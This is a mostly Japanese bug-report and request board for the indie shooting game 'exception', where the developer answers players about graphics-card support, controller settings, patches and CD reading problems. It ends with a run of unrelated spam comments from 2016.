

0. i-saint: 要望とかバグ報告とかあれば。 - 2007/11/11 00:55:33
1. salt: ワイド画面でフルスクリーン軌道としたところ、動作せず。 - 2007/11/11 11:59:02
2. i-saint: ろすとさんだ。モニタが指定の解像度に対応してないとかかな。ウィンドウモードは起動できます? - 2007/11/11 12:53:08
3. wim: 難易度選択後、強制終了します。フルスクリーンでもウインドウでも発生しました。 - 2007/11/11 15:17:25
4. wim: スペックはCore2Duo E6750、2GB、WinXPSP2、RADEONX1950proです - 2007/11/11 15:21:32
5. wim: ブラー無効化をOFFにしようとすると未対応とエラー表示が出ますが、関係あるのでしょうか? - 2007/11/11 15:22:57
6. i-saint: うげげ、Radeon系はチェックが甘くてすみません…。 ブラーのon/off、OpenGLのバージョンが低いとそのエラーが出ます。RADEONX1950ならドライバ次第で対応できると思うんですが…、ゲーム起動&即終了させて、stdout.txtの6行目のバージョンは何と書かれてますかね? - 2007/11/11 16:03:48
7. niha: キーコンフィグでシフトやスペースに割り当てられるようにして欲しいかもです。あと向き左回転と右回転用のボタンとか設定できると非常にうれしいかも… - 2007/11/11 16:16:27
8. i-saint: あと、もしシェーダが使用可能になってたら無効にして、[頂点バッファの使用も切ってみてください。 - 2007/11/11 16:17:50
9. i-saint: ミスった上に前後しとる。 >nihaさん 了解です。次のバージョンでやっておきますです。 - 2007/11/11 16:25:52
10. wim: >i-saintさん 6行目は「2.0.6956 WinXP Release」でした。あと、強制終了の原因はシェーダーの使用でした。 - 2007/11/11 17:33:11
11. i-saint: なるほど。OpenGLのバージョンチェックがちと甘かったようです…。もっと厳密にやるようにしておきます。 - 2007/11/11 18:13:33
12. Thomas: Super travail ! , Great works ! - 2007/11/29 04:42:05
13. nakanon: はじめまして。このゲームの委託販売等はされるのでしょうか?? - 2007/11/29 23:10:20
14. i-saint: 可能なら委託販売、そうでなくても何らかの形で通信販売できるようにする予定、です。ただ、委託だとコミケから2ヶ月程後になるかもしれませぬ。 - 2007/11/30 00:22:29
15. i-saint: ↑*3の前半、どういう意味だらう。「最高の骨折り」て…。と、とりあえず thank you for plaing :) - 2007/11/30 00:25:40
16. _: 労作>travail - 2007/12/01 14:51:19
17. i-saint: なるほど。 - 2007/12/01 17:40:28
18. nakanon: 返信送れてすいません。委託された際には是非とも購入させていただきます.(_ _) - 2007/12/01 19:34:51
19. i-saint: ありがとうございます。気長にお待ちください。 - 2007/12/01 23:09:48
20. Succulla: これはやみつきになるゲームですね・・頑張ってください。 - 2007/12/02 13:44:38
21. i-saint: が、がんばります…。あとランキング投稿ありがとうございます。3面道中、想定してたより稼いでて見てて楽しいです。 - 2007/12/04 21:38:47
22. Succulla: 知らない間にかなりはまっています…この爽快感はもっと宣伝すべき - 2007/12/07 21:29:08
23. Succulla: 冬コミは行けませんが応援しています - 2007/12/07 21:29:43
24. : 徹夜してしまいそうなくらい期待!ただ気になったのがレイ 難易度が上がると共にロックオン数と速度を上げて欲しいななんて・・・ これはただ単に自分がヌルゲーマーだからなのか・・・ 仕様だったらすいませんorz - 2007/12/12 01:14:52
25. : 爽快なのはいいのですが方位転換はマウスでも可能なようにしてほしいっす - 2007/12/12 16:57:18
26. i-saint: 高難度モードになるにつれてカタパルト偏重になっていくように意図してるので、レイはこのままかもしれません…。マウス対応は完全に思考の範囲外でした、が、簡単にできそうな気がするのでサクっとやっとくかもしれません。時間が欲しい時間が。 - 2007/12/13 18:30:12
27. iganita: 初めて映像を見た時、グラディウス?と思ってしまいました。(^_^)でも、横スクロールSTGが苦手な人はこれから始めてみるのもアリと思う。m(_ _)m - 2007/12/14 21:00:10
28. RT: 方向調整で正面に合わせずらい…方向転換ボタン同時押しで右水平にできるとかになると楽かな、と思いました。 - 2008/01/01 16:42:18
29. : レーザー撃ってるときは時機の移動は出来ないんですか? - 2008/01/01 22:52:51
30. i-saint: >正面に合わせずらい ぐはー、私自身は4+方向キーでやってるんで気が回りませんでした。実装しきれなかったマウス対応と併せて次のパッチでなんとかしますです。 - 2008/01/02 08:32:06
31. i-saint: >レーザー撃ってるときの自機の移動 いえ、4+方向キーで回転中の時以外は可能なはずです。ただ、同時押し対応数の少ないキーボードだと何か支障が出るかもしれません。 - 2008/01/02 08:36:37
32. : ブラー有効化の条件って何ですか?OpenGLよく分からないもんで - 2008/01/02 10:32:38
33. i-saint: GeForceなら6000系以上、RadeonならHD2000系以上のビデオカードを積んでる必要があると思われます>ブラー - 2008/01/02 11:48:41
34. kei: DLして初めてプレイした時は正常に左右回転できていたのに、それ以降のプレイから右回転だけ受け付けなくなりました。パッドが壊れたのかとも思い確認したところ正常でした。 - 2008/01/03 19:06:57
35. i-saint: むむ、効かなくなったのは4+方向キー、左右回転ボタンどちらでしょうか。あと、拡張子の無いconfigってファイルを一度消してみると何か変化はあります? - 2008/01/03 21:24:29
36. : エフェフルにしても背景のうにょーんと光るエフェクトが表示されません・・・。 - 2008/01/08 22:19:49
37. i-saint: OpenGL2.0に対応してるビデオカード積んでないとブラーと光る系エフェクトは使えませんです。上記のブラーの件同様、GeForceなら6000系以上、RadeonならHD2000系以上のビデオカード。GeForce6000系とそれ以前では使える機能に大分差があるのです…。 - 2008/01/08 22:30:46
38. : WASDを方向キーに変更できませんでしょうか?> - 2008/01/15 09:44:55
39. : 兎に角操作性が悪いお - 2008/01/15 10:17:51
40. i-saint: >WASD 現状変更不可能ですね…。次で変更可能にしてみます。マウス操作入れた時点でやっとくべきでした。 - 2008/01/15 14:39:56
41. i-saint: ちなみに私はパッドで4+方向キーが最も直感的でやりやすいと感じていて、これ以上に良好な操作法はちょっと思いつかない状態。うむむ。 - 2008/01/15 14:46:00
42. A: パッチはどこから入手すれば良いのでしょうか? - 2008/01/17 21:37:39
43. i-saint: 完成版であれば、起動したらアップデートするか否かをダイアログ出して聞いてくるようになってます。もし出ない場合セキュリティソフトの類が邪魔してるかもしれません。(起動時にネットワーク経由でパッチの有無調べるようになってます) - 2008/01/17 22:45:44
44. ディメトロ: 移動キー変更の対応、お疲れさまです。WASD+ペンタブ使用で非常にやりやすいです…! 報告ですが、体験版1.02にて、ネットランキングのリプレイが再生出来ないっぽいです。 - 2008/01/17 23:44:52
45. A: おお!なんと自動でアップデートしてくれますね。これはすごい - 2008/01/17 23:59:12
46. i-saint: ぶ、すみません、体験版完成版両方ネットランキング死んでました。直しました。報告ありがとうでした。 - 2008/01/18 00:24:51
47. : WASD変更乙です。でも操作難しいお。ゲームシステムに係わることだが自機を左右のみとか、左右2ボタンでそれぞれ押しっぱなしでレーザー、離すとロックオン、左右同時押しでカタパルト。これなら移動キー+2ボタンで解りやすいのでは? - 2008/01/19 16:55:51
48. i-saint: カタパルト=同時押し は、方向転換しつつカタパルト撃つのが大変という理由からボツった操作だったりします。 あと、基本レーザー押しっぱなしでレイ撃つ時はレーザーと同時押し、というスタイルもいるようなので、今からの変更はちと避けたい…。 - 2008/01/19 21:32:31
49. TOKEN: ブラーの事なんですが、Radeon X1300/X1550 Seriesってのじゃダメなんでしょうか? - 2008/01/28 21:05:07
50. i-saint: HD2000未満なので、未対応ですね…。RadeonはOpenGLへの対応が遅くて、相当新しいのじゃないとエフェクト全開にはできなようです。 - 2008/01/28 22:21:04
51. TOKEN: そうなんですかぁ。じゃあ新しいPC買った時にでもエフェクトを楽しもうと思います(>_<) 今はfutureラス面でfps5になりながら楽ませてもらってますw(CPU 2GB) - 2008/01/28 23:45:24
52. Tasuku: 一昨日購入させて頂きました。 echoes(www.binaryzoo.com/games/echoes/index.htm)のようなアナログスティックx2操作にして頂けると直感的に動かせそうな気がします。 - 2008/02/09 09:32:37
53. i-saint: 今スティック持ってないんですが、用意してみようと思います。使用してるライブラリ(SDL)が対応してるかがちょっと怪しげですが…。 - 2008/02/12 16:43:55
54. irk: なんという面白さ!全然クリアできないですが、凄く楽しませてもらってます - 2008/02/12 17:50:06
55. ark: 委託を購入させてもらったんですけど、CDを読み込ませても音楽ファイルのみしか表示されません。 - 2008/02/12 23:30:20
56. i-saint: >arkさん CDドライブがCD-Extra仕様のCDの読み込みに対応してないのかもしれません。可能でしたら他のCDドライブでも試してみてください。無理な場合、topにあるメールアドレスにメール頂けると幸いです。 - 2008/02/13 07:19:44
57. ark: 他のCDドライブで起動したら出来ました、ありがとうございました。 - 2008/02/13 09:30:55
58. : 家にネット環境がないので、パッチ当てられないのですが・・・ - 2008/02/16 20:46:18
59. i-saint: ネット環境があるところに持っていって、(ゲーム全体でもupdater.exeだけでもok)パッチダウンロード>持ち帰って上書きコピー で対処できませんか? - 2008/02/17 01:40:55
60. Tasuku: ありがとうございます。楽しみにしてます。(^^)>2008/02/12 16:43:55 - 2008/02/17 15:15:47
61. : updater.exeを実行しても、既に最新版といわれちゃう... ゲームを起動しても1.00のままです。。何故。。。 - 2008/02/17 21:43:11
62. i-saint: 何らかの理由でupdaterだけ最新版になっているようです…。一度ダウングレード(CDから上書きコピー)してから再度アップデートしてみてください。 - 2008/02/17 22:23:44
63. nx: うーん。駄目ですねえ。書き込めない承知の上、CD上からupdater.exeを動かしても最新版といわれます。。ちなみにCDに入ってるupdater.exeのmd5sumは 52c59927e7a370d40d608f41f769fa12 です。。 - 2008/02/18 00:25:25
64. i-saint: md5sum、正しい値のようです。サーバーから返ってきた文字列が変な内容だった場合(403が出た場合とかに起こりうる)その症状が起こりますが、それ以外は完全に想定外です。謎…。製品版のexeアップロードしたらパッチが返るようなcgiを作ってみます。しばらくお待ちください。 - 2008/02/18 02:51:00
65. nx: すみません。わかりました。セキュリティソフト(Norton Firewall)が有効だった場合、どうもブロックが働いているようです。(どのブロック機能でおきてたかは調査できていませんが)。すみませんでした。。 - 2008/02/18 09:15:11
66. i-saint: なるほど。ブロックされた場合、「そのようなホストは見つかりません」みたいなエラーが出ると思ってたんですが、こうなっちゃうんですね。 - 2008/02/18 10:41:50
67. : めちゃめちゃ面白い!体験版やって、即行DL販売でゲットして、さっきeasyクリアしました。やりこみたい! - 2008/02/19 10:26:32
68. : メッセで買ってみましたがこれ凄くいいですね。絵起こしてグラ貼り付ければゲーセンに置けるレベルですよ。 - 2008/02/22 01:49:32
69. tomotaco(id:logion): メッセ通販で購入して以来面白すぎて毎日のようにハマっています。また、non_power_of_two 問題に対処するようソースを改造してみました。(http://d.hatena.ne.jp/logion/20080224#p2) 手元の RadeonX1600Pro ではエフェクトの類が有効にできているようです。 - 2008/02/24 00:26:25
70. ディメトロ: Ver1.04パッチ製作、お疲れさまです!RadeonX600でもブラーが使えるようになって、画面がぼわんぼわんなって感動しまくりです…。tomotacoさんGJです!ちょっと気になったんですが、ネットワークプレイの場合、「マウス操作だと自機の向きが定まらない」んですが、対応は難しいでしょうか。「マウスの場合は情報量とか、どうなのかな?」と思いますし、対応しないならしないで、キーボードプレイをするので一向に構いませんが~(笑 - 2008/03/02 18:49:28
71. i-saint: ネットプレイの場合、遅滞フレーム分前の自機の方向を元に方向転換することになるので、こうなってしまいます。なんとかしたいなあとは思ってるんですが、対処が難しいのでこのままかもしれません…。 - 2008/03/02 19:06:29
72. : アップデートが出来ないんですが…… - 2008/03/03 21:04:34
73. : 収録されている8つの曲の曲名を教えてもらえないでしょうか?すごくいい曲だけに曲名無しのまま聞くのは忍びないです。 - 2008/03/04 00:28:51
74. i-saint: >アップデート セキュリティソフトが邪魔しているか、ファイルが「読み取り専用」になってるかもしれません。http://i-saint.skr.jp/exception/manual.html#faqここにある症状以外の場合、お手数ですが詳しい症状ををお聞かせ願えませんでしょうか。 - 2008/03/04 01:02:16
75. i-saint: >曲名 サウンド担当のカワノさんのところに曲目リストがありました。http://pocomo.hp.infoseek.co.jp/exception/ ちなみにiTunesや一部のCDDBには登録済みだったりします。 - 2008/03/04 01:08:30
76. ディメトロ: ネットプレイの件、なるほろです。無理はなさらないでください~。  アップデート、私も最初は駄目でした。が、ゲームディスクから「record」以外のフォルダ及びファイルを持ってきて上書き(=ダウングレード)、それからupdater.exeを実行したら成功しました。参考までにどうぞです。 - 2008/03/04 01:12:09
77. kuukai: 1.04パッチ作成お疲れ様です~。 時にあれ?と思ったので報告を。Start→Localと選択し、Serverを選択するとチャットおよび接続確認画面が出ますよね?その後Localを選択しゲームを開始するとサーバー画面が出たままになっています。実質ゲームに問題が出るわけではないのですが、Local選択時に自動で閉じるようにして頂けませんでしょうか? - 2008/03/15 16:06:16
78. i-saint: チャット画面のことであれば、ログを残すために意図して残すようにしてます。ウィンドウ右上のボタンで閉じてくだされ。 - 2008/03/15 17:27:42
79. kuukai: なるほど、意図して残していたのですか。合点了解です。 - 2008/03/15 23:31:06
80. KS: タイトル画面やレーザーなどの光っている部分が四角い絵みたいな物に化けて表示されます。敵本体等は普通に表示されます。あと、常に後ろを向いてしまうようです。スペックはpentium4 3GHz、WinXPsp2、GeForce7600GSです。 - 2008/03/16 22:21:25
81. i-saint: テクスチャが正常に表示されてない感じですかね?ちと今までにない症状で状況が掴めないので、ビデオカードのドライバ最新にして、直らなければスクリーンショットをメールか何かで送ってもらえませんでしょうか。(PrintScreenキーで撮影) 後ろを向く症状、スティックの処理に心当たりがあるんですが、スティック付きのコントローラを使ってますか? - 2008/03/16 22:37:44
82. KS: ドライバを更新してみましたが、症状は変わりませんでした。ので、後ほどスクリーンショットを送らせていただきます。コントローラは、スティックはついてないですね。DPP接続でサターンパッドを使用しています。 - 2008/03/16 23:27:24
83. fact: 楽しく遊ばせてもらってます。Ver1,05のパッチを適用した所、自機移動方向によって向きが動く様になったのですが、これは仕様変更でしょうか。上移動で左向きに、下なら右向き、左移動で上向き、右で下向きに強制的に向かされてしまいます。動作環境:pen4 2.8GHz Geforce6800 WinXPsp2(32bit)パッドにはPSコントローラー(レバーのない奴です)をSmartJoyPadで接続しています。 - 2008/03/16 23:36:35
84. i-saint: スティック対応による弊害のようです…。KSさんの後ろ向きも、恐らく同じ原因によるものと思われます。スティックによる方向転換切れるようにするオプション次でつけます。 - 2008/03/16 23:47:52
85. fact: 風呂上りに見たらもう返信が…w次パッチ待ってます、ありがとうございました! - 2008/03/17 00:09:05
86. i-saint: >KSさん メールありがとうございました。テクスチャが変になってますね…。resourceフォルダをCDからコピーし直して、exceptionフォルダ丸ごと「読み取り専用」を解除して改善されますでしょうか。 - 2008/03/17 00:10:28
87. i-saint: 追記、上記対処法でダメな場合、お手数ですがCDのresource/resource.igzをメールで送っていただけると幸いです。文字は大丈夫なあたり、リソースファイルが壊れてる可能性が濃厚なのですよね…。 - 2008/03/17 00:22:57
88. KS: 上記の対処法を試してみましたが、改善されませんでした。CDのresource/resource.igzを送らせていただきます。お手数おかけいたします・・・。 - 2008/03/17 02:24:18
89. i-saint: 長引きそうなので、以後メールの方で連絡します。不具合申し訳ない。 - 2008/03/17 14:57:07
90. jnz: 1.05にアップデートしたところ、KSさん同様に常に左向きになってしまします。左右回転をZ-up/downに割り当ててもやはり同様です。ゲームコントローラのプロパティでZ軸/Z回転を中心基準無効、Z軸/Z回転自体無効にしても同様でした。コントローラはXbox360の有線を使用してます。ドライバはMS公式のものでキャリブレート後、非公式ドライバ(X360C 2007/12/23更新のもの)を入れてあります。 - 2008/03/17 19:51:24
91. i-saint: パッド関連はもうすぐなんとかできそうなんで、多分今夜中にパッチ出しますです。私はXBOX360用有線白コントローラーで、マシンに刺したらそのまま使えたんで何も弄らず使い続けてるんですが、非公式ドライバだと軸のインデックスが違うんでしょうかね。 - 2008/03/17 20:43:41
92. jnz: なるほど、MS公式ドライバではokなんですね。非公式ドライバは、X/Y軸-32768~32767、Z軸/Z軸回転は0~255(中心点128)までの値を返すようです。非公式ドライバのほうが、トリガーをボタン扱いにできたりして便利なんですけどね。 - 2008/03/17 21:56:17
93. i-saint: >Z軸/Z軸回転は0~255 ぶっ!それは酷い仕様。情報感謝です…。 - 2008/03/17 22:11:32
94. jnz: SDL_Joystick関連をちょっとググってみましたが、軸の範囲は調べられそうにないですね。ちなみに右スティックをZ軸/Z回転ではなく、X回転/Y回転に設定すると(非公式ドライバではこれがデフォルトです)、X軸/Y軸と同じ-32768~32767の範囲になります。ですので、回転をZ軸/Z回転だけでなく、X回転/Y回転にも設定できたら解決できそうですが…。こんなマイナーなドライバのために対応してくださいってのも気が引けるので、素直に旧Ver.で楽しむことにします。 - 2008/03/17 23:09:50
95. i-saint: 急ごしらえですがパッチ出しました。回転用の軸とその閾値を指定できるようにしました。設定苦労しそうですが多分いけるんじゃないかと思います。 - 2008/03/18 00:10:32
96. i-saint: あとKSさん、パッド関連で慌しくてメール出し損ねましたが、一箇所非常に怪しい部分見つけて修正しました。多分直ってるんじゃないかなーと思うんですがいかがでしょう…。 - 2008/03/18 00:11:59
97. jnz: ぅぉ!コントローラ関連の設定がすごい充実!右スティックでの方向転換もバッチリですよ。攻撃をFPSっぽくトリガー等に割り振れば、以前より操作しやすいかも。感謝、感謝です! - 2008/03/18 01:31:58
98. KS: 1.06にアップデートしてみました。結果は、画像の化けは変化なし、パッドの方向は右に向くようになりました。画像はかなり難儀な部分なようですね; - 2008/03/18 01:41:22
99. 774: 1.06にアップデートしたら、自機コントロールに不具合が出ました。スティックを左上入力時に右上移動。右下入力時に左下移動します。その他の方向は問題ありません。使用コントローラーはエレコムアーケードスティックJC-AS01BKです。 - 2008/03/18 04:35:30
100. i-saint: >KSさん 画像の件、後ほどメールいたします…。パッドの方向、右向きっぱなしになるということでしょうか。 - 2008/03/18 17:15:31
101. i-saint: >774さん ちと確認ですが、1.06以前では問題ありませんでした? - 2008/03/18 17:15:51
102. id:logion: 対応お疲れさまです。実は 1.05, 1.06 では RadeonX1600Pro+Catalyst8.2 の組み合わせでもConfig画面からシェーダーを有効にできませんでした。修正は1行だけで済みましたのでパッチをどうぞ~。http://d.hatena.ne.jp/logion/20080318#p1 - 2008/03/18 18:59:14
103. i-saint: 今朝日記を見て唖然としてました。ひどいミスすみませんorz 毎度ありがとうです。 - 2008/03/18 19:21:54
104. i-saint: 今度こそRadeon対応のパッチ出しました。コントローラの件、1.05以降対応したハットスイッチに心当たりがあったので無効化してみました。KSさんのテクスチャ化けはドライバ変更で直ったそうです、原因はっきりしなくて少々怖いですが…。 - 2008/03/19 04:31:26
105. id:logion: 今度はバッチリです>Radeon対応対応ありがとうございました~。 - 2008/03/20 01:01:22
106. mikan: ver1.00からupdater.exeを使用して最新版に上げようとしても『最新版です』といわれてしまいます。どうしたらよろしいのでしょうか? - 2008/03/20 18:43:28
107. mikan: すみません。過去ログ読んだら解決しました。 - 2008/03/20 18:44:57
108. justy: 自分のrecordの数が増えてくるとカーソルを合わせないとスコア以外の詳細がわからないという仕様が不便に感じるのは私だけでしょうか。 - 2008/03/21 02:31:39
109. i-saint: ふむう。次で改善してみます。 - 2008/03/21 12:52:56
110. koki: 凄く面白いのですが、ダメージ音がないので気が付かない間にライフが減ってる事が多いです。音を追加してもらえないでしょうか? - 2008/03/26 07:42:54
111. i-saint: 了解です。次で改善してみます。 - 2008/03/26 17:17:11
112. koki: 楽しみにしてます。それから度々すいません。2面の小さい紫のブロックが、futureだと蒸発現象で見辛いです。なんとかならんでしょうか? - 2008/03/28 15:22:37
113. Tasuku: スティック対応ありがとうございました。 色々と御苦労されたようで申し訳ありません。 格段に操作し易くなりました。(^^) - 2008/03/28 19:38:23
114. koki: 格段に遊びやすくなりました。これで少ない体力でもねばれます。更新ありがとうございます。m(__)m - 2008/04/14 23:24:22
115. koki: お願いし過ぎなので本当に恐縮ですが、2ゲーム以上やってると雪目になるので、本当に出来ればですが、光線の光量を落とせる設定を付けて頂けると助かります。それにしてもfutureのmain強いです、燃えます(笑 - 2008/04/15 15:24:25
116. i-saint: 了解です。ハットスイッチ使えるようにしてほしいという要望もあったんで、両方コンフィグで変更可能にしてみます。 - 2008/04/16 12:58:50
117. koki: うお、重ね重ねすいませんm(__)m、やっとこさfutreでクリア出来ました(まだ倒せてないですが)すごく面白かったです。ありがとうございます。次はノーミスで一周が目標です。 - 2008/04/18 18:03:20
118. koki: 神速の対応、ありがとうございました。ボスに普通に勝てるよう精進します(汗 - 2008/04/20 12:53:28
119. : is there an english version of this game somewhere? - 2008/04/20 14:59:28
120. : fantastic - 2008/04/22 22:13:40
121. JonnyO: This game needs writing for the PS3 and putting up on the Playstation Network! - 2008/04/24 00:39:27
122. ksz: ソースが非常に気になって購入しました。ソース公開バンザイ! しかしスゲェプログラムの書き方だ・・・。 んで、ゲーム本体はと言うと4面のボス倒せず・・・。まぁ、それは置いといて。 左手でゲームパッド、右手でマウスでやってるんですが、マウスの場合のレーザーとレイの優先順位がレーザー優先になっちゃうのがちと困ります。ソースを洗った感じだとGetMouseInput()のelse外してくれれば良いのかなーって思ったんですが。 何か別の不具合が発生するんでしょうかー。 意図的だったらゴメンナサイ。 - 2008/04/25 10:47:59
123. i-saint: あー、elseいらんですね、これ。次で改善しときます。開発初期は人に読みやすいソースを目指してた気がしますが、開発中盤以降はホント余裕なくて、自分が忘れたら困る最低限の内容しかコメントがない、大変臨場感のある内容になっております。 - 2008/04/25 18:35:32
124. i-saint: 英語版は…、configの英語の解説作っとけばなんとかなるかな。ゲーム中だと翻訳だけじゃなくて、windowsの言語設定見てフォントも変える必要があるようだ。試す環境がないから怖い。 あと、PS3ネットワークよりXBOXLiveArcadeに出してみたいですのう。 - 2008/04/25 18:42:28
125. acca: so good - 2008/04/26 01:41:55
126. otakuforlife: Is there a server I can play on if is so what's the IP? - 2008/04/29 01:03:50
127. : Starting up a server game let me know if anyone wants to play me and when... - 2008/04/30 05:15:52
128. Pathie: At first I was worried about all the cubes, but I've come to like this game. You can thank DLsite for bringing this to my attention. Good Job. :D - 2008/05/02 13:00:39
129. JT: why is the site in japanese? - 2008/05/13 09:43:15
130. TD: How do You start a network game in this thing? xD - 2008/05/16 00:09:20
131. : Will you please release more levels? Or a level editor?Also the soundtrack is fantastic! - 2008/05/18 11:44:10
132. iosomewhere: Thanks,great game ! Hope more Levels come out !!!!! - 2008/05/22 19:23:43
133. sz: どなたか右スティックで方向転換するための設定を教えていただけないでしょうか。自機が上を向きっぱなしです。コントローラは箱○有線、ドライバは非公式(X360C)のもの、ヴァージョンは1.09です。 - 2008/07/04 23:43:55
134. i-saint: コントロールパネル>ゲームコントローラ からコントローラのプロパティを開いて、Z軸,X回転,Y回転などと表記されてるものと右スティックの対応を調べ、それをconfigで割り当ててみてください。上向きっぱなしなのは「方向軸閾値」を25000~30000くらいに上げてみると直るかもしれません。(無茶苦茶不便なのは自覚しとるんですが、数あるコントローラに個別に対応するのは現実的ではないのでこうなってます。すみませぬ。) - 2008/07/05 00:51:20
135. i-saint: 参考までにXBOX360のコントローラで公式ドライバの場合、X→Z回転、Y→X回転で上手くいってます。 - 2008/07/05 00:54:23
136. sz: 返信ありがとうございます。色々やってみましたが、非公式ドライバでは無理なようですね。方向軸閾値は32767だと上(または左)向きっぱなし、32768だと入力に対して無反応になってしまいます。方向入力は上下、もしくは左右だけなら可能なのですが…。 - 2008/07/05 19:49:39
137. TAK: ラスボス第3形態のレーザー反射戦オンリーモードとか出来ませんかね。楽しいのにすぐ終わってしまうので。 - 2008/07/07 02:28:30
138. jnz: ウチでは、X360C側の右スティックをZ軸/Z回転、exception側の方向軸のXをZ軸、同じくYをX回転で使用できてますよ。 - 2008/07/07 02:38:49
139. jnz: あ、方向軸閾値は15000です。 - 2008/07/07 02:41:07
140. sz: jnzさんありがとうございます。それでいけました。私のはホリの連射パッドだったんでダメかなーと思ってたんですけど、大丈夫だったようですね。閾値は下手に弄らない方が良さそうですね。 - 2008/07/08 14:08:00
141. TOBY: こんにちは!ぜひソースを参考にさせていただきたいと思っているのですが、今回Luaは使用されていないのでしょうか?Lua以外の場合、スクリプティングやデータ定義などには何か使われておりますでしょうか? - 2008/07/20 18:42:23
142. i-saint: 今回外部スクリプトは使わず、ステージ構成等のデータも直接C++で書いてます。構想段階からステージもボスもギミック満載にする気で、この規模のゲームのためにそんな汎用性の高い外部スクリプト用データ作るなら直接C++で書いた方が早い、と思ってこうしました。(かなりシビアに処理速度を要求されるから、等の理由もあります) - 2008/07/20 21:37:38
143. i-saint: ちなみにコーディング時に心がけたことは、「抽象度は低く」「汎用性は捨てる」でした。過去(EmpireTohu)に抽象度を高くした結果面倒になって飽きて挫折、という失敗を犯してるので…。 - 2008/07/20 21:42:29
144. TOBY: ありがとうございます。C++ベタは意外でした。なるほど……抽象度を低くして、実装の容易さを選んだということなのですね。参考になりました。 - 2008/07/21 13:26:49
145. koki: 今更のアップデートお疲れさまです。うは、うちのQ6600で4スレッド化したら処理オチがかなり少なくなって(未来5面で40fpsくらいまで)難易度が上がりました(笑)でもヌルヌルで楽しいです。ヒントを言われるまで4面ボスのハッチの開け方が分かりませんでした(笑) - 2008/09/09 21:08:38
146. Jun: 今日買ったんですがオーディオCDとしか認識されない・・・ - 2008/12/29 20:07:23
147. i-saint: たぶんCDドライブがCD-Extraの読み込みに対応してないんだと思われます。別のCDドライブで試せませんか? - 2008/12/30 00:39:45
148. Jun: 早速の返信ありがとうございます。年明けにでも確認してみます。 - 2008/12/31 11:47:30
149. Jun: 3つほどCDドライブを試してみましたがいずれもオーディオCDとしてしか認識されませんでした。残念です。 - 2009/01/07 22:55:19
150. i-saint: うへえ、それはCDの方に問題ありそうな気もしますね…。メール経由でゲーム本体を送りたいのですが、メール頂けますでしょうか。 - 2009/01/08 13:25:51
151. spooky: アーケード版でお忙しいところ失礼かもしれませんが、もし機会があればXboxLiveアーケード版も出たら嬉しいです - 2009/08/03 23:42:22
152. @: 要望です。exceptionのアーケード版の操作を練習したいので、同人版のほうに、アーケード操作(ショット、レイ同時押しでのカタパルト)を追加していただけないでしょうか。 - 2009/08/11 00:24:36
153. i-saint: >spookyさん 私も出たら嬉しいですが、私一人でどうこうできるような話ではないですね…。 - 2009/08/11 08:10:00
154. i-saint: >@さん コンフィグとの兼ね合いもあって、同時押しを設定できるようにするのは色々厄介なので対応しないと思います。すみませぬ。 - 2009/08/11 08:12:44
155. CORM: アーケード操作でプレイしたい人はJoytokeyというソフトを併用するといいよ - 2009/08/11 12:51:55
156. any: 昨日ロケテで見かけて結構衝撃受けました。successが噛んでるからザンファインのチームか?と思ったらまた違うんですね。コミケ寄らせてもらいます - 2009/08/15 10:44:01
157. : つーか普通に上級者向けっていう設定でやりゃよくね - 2009/09/11 12:33:35
158. ZZD: アーケード版の操作方法ですがDボタンを追加してカタパルトを単独ボタンで発射できるようには出来ないでしょうか?同時押しを連打していると指がつってきてしまうのです。 - 2009/09/18 18:53:04
159. UN: こんにちは。凄い今更ですがキーコンフィグの設定可能キーに何故テンキーが無いんですか? 移動をテンキーに割り当てたかったんですが… - 2010/04/05 02:18:18
160. : NESiCAxLive版稼動記念かきこ - 2011/07/27 22:17:38
161. : ゲーセンでやりました。超おもしろかった - 2011/08/01 00:54:55
162. : Win7に対応して頂けると嬉しいです。 - 2012/02/10 19:42:59
163. : Nesicaにてプレイして非常に面白かったのですが、もう再販の予定はないのでしょうか? - 2012/03/29 18:16:49
164. : 今日ネシカでたまたまプレイしましたが、シューティングをあまりやらない自分でもとてもおもしろかったです! - 2012/12/29 23:30:30
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302. Travis: Do you like it here? - 2016/03/04 10:01:21
303. Reyes: Insert your card - 2016/03/04 10:01:22
304. Julian: I'm afraid that number's ex-directory - 2016/03/04 10:01:25
305. Bennett: I sing in a choir - 2016/03/04 10:01:28
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310. Antony: I'll text you later - 2016/03/04 10:01:38
311. Dewitt: I came here to work - 2016/03/04 11:26:51
312. Terence: Withdraw cash - 2016/03/04 11:26:53
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319. Bob: Remove card - 2016/03/04 11:27:08
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321. Lawrence: I'm retired - 2016/03/04 12:51:40
322. Lesley: I'd like to speak to someone about a mortgage - 2016/03/04 12:51:42
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325. Carmelo: Where did you go to university? - 2016/03/04 12:51:50
326. Whitney: I wanted to live abroad - 2016/03/04 12:51:53
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337. Cliff: Enter your PIN - 2016/03/04 14:17:23
338. Robby: What do you do for a living? - 2016/03/04 14:17:26
339. Malcom: Which university are you at? - 2016/03/04 14:17:31
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343. Alex: I'd like to pay this in, please - 2016/03/04 15:43:37
344. Marco: I've only just arrived - 2016/03/04 15:43:39
345. Doyle: Lost credit card - 2016/03/04 15:43:42
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353. Derick: Looking for work - 2016/03/04 17:10:08
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358. Ashton: I'll call back later - 2016/03/04 17:10:18
359. Chris: I came here to work - 2016/03/04 17:10:21
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361. Isabel: The manager - 2016/03/04 18:37:23
362. Mitch: I've been made redundant - 2016/03/04 18:37:24
363. Darrick: I came here to work - 2016/03/04 18:37:26
364. Mary: What's the exchange rate for euros? - 2016/03/04 18:37:28
365. Adolph: I like watching TV - 2016/03/04 18:37:30
366. Harvey: How many weeks' holiday a year are there? - 2016/03/04 18:37:32
367. Rocky: Sorry, I ran out of credit - 2016/03/04 18:37:35
368. Harley: I've been cut off - 2016/03/04 18:37:37
369. Nilson: I'd like to tell you about a change of address - 2016/03/04 18:37:40
370. Virgil: I came here to work - 2016/03/04 18:37:42
371. Sheldon: What part of do you come from? - 2016/03/04 20:03:58
372. Sanford: Thanks funny site - 2016/03/04 20:04:00
373. Clarence: Thanks funny site - 2016/03/04 20:04:02
374. Lucien: I'm interested in this position - 2016/03/04 20:04:06
375. Ignacio: It's funny goodluck - 2016/03/04 20:04:08
376. Micah: I'd like to cancel a cheque - 2016/03/04 20:04:11
377. Christoper: No, I'm not particularly sporty - 2016/03/04 20:04:16
378. Sylvester: this is be cool 8) - 2016/03/04 20:04:18
379. Bruno: We used to work together - 2016/03/04 20:04:21
380. Deadman: I'd like some euros - 2016/03/04 20:04:25
381. Abram: I'm doing a masters in law - 2016/03/04 21:30:33
382. Vanessa: Could I have , please? - 2016/03/04 21:30:35
383. Kenneth: I'm at Liverpool University - 2016/03/04 21:30:38
384. Ronnie: A book of First Class stamps - 2016/03/04 21:30:43
